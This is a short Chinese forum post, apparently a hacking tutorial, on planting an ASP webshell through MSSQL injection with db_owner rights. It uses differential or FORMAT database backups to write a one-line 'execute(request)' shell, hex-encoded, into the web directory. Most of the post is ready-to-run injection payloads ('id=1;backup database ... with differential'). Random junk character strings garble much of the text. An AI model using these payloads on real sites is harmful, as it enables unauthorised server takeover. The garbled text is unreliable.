DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:

1 G! ^4 N2 t' ~# U( F/ ~- Q减少备份文件大小，得到可执行的webshell成功率提高不少
' Q$ l. L. G9 T# L5 u/ ]( h一利用差异备份
3 j2 }6 `4 }9 S- B3 [3 O加一个参数WITH DIFFERENTIAL

0 m' g  s4 k( u( O$ E: ?$ s1
% P- {" z: D' a7 w1 ]7 I, n3 L3 C8 q* |2
1 z4 i& T. U9 r3
4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
0 b' J1 E$ Q/ Ocreate table [dbo].[xiaolu] ([cmd] [image]);
% Z0 I  N+ n7 _% Kinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL

二利用完全FORMAT
* o  S6 e! q; G" U8 x, c* \加一个参数WITH FROMAT
. j6 a$ ^+ [, G1 o; n5 ~有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以
( X1 K2 |9 b4 I4 E" j! H
1
2
3
, Q2 Z& N; J* P* }/ e6 O4
( \2 v% A5 }7 E/ d; ^- }. N( k/ _ declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
/ K' Y# d# P( h+ p& w8 D1 |declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT

7 z; m0 g- F5 F# [总的来说就是那么简单几句,下面以备份数据库model为例子
1
9 E% y8 S; t0 `- b7 w! P
1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
4 e& b( M6 R0 t$ x' w
7 k+ `( w8 D2 U8 ^1 {$ j+ ~; ~# v& o2

1
7 f+ V; c- i  j3 l id=1;backup database model to disk='你的路径‘ with differential,format;--
8 t5 C" [, k" @! @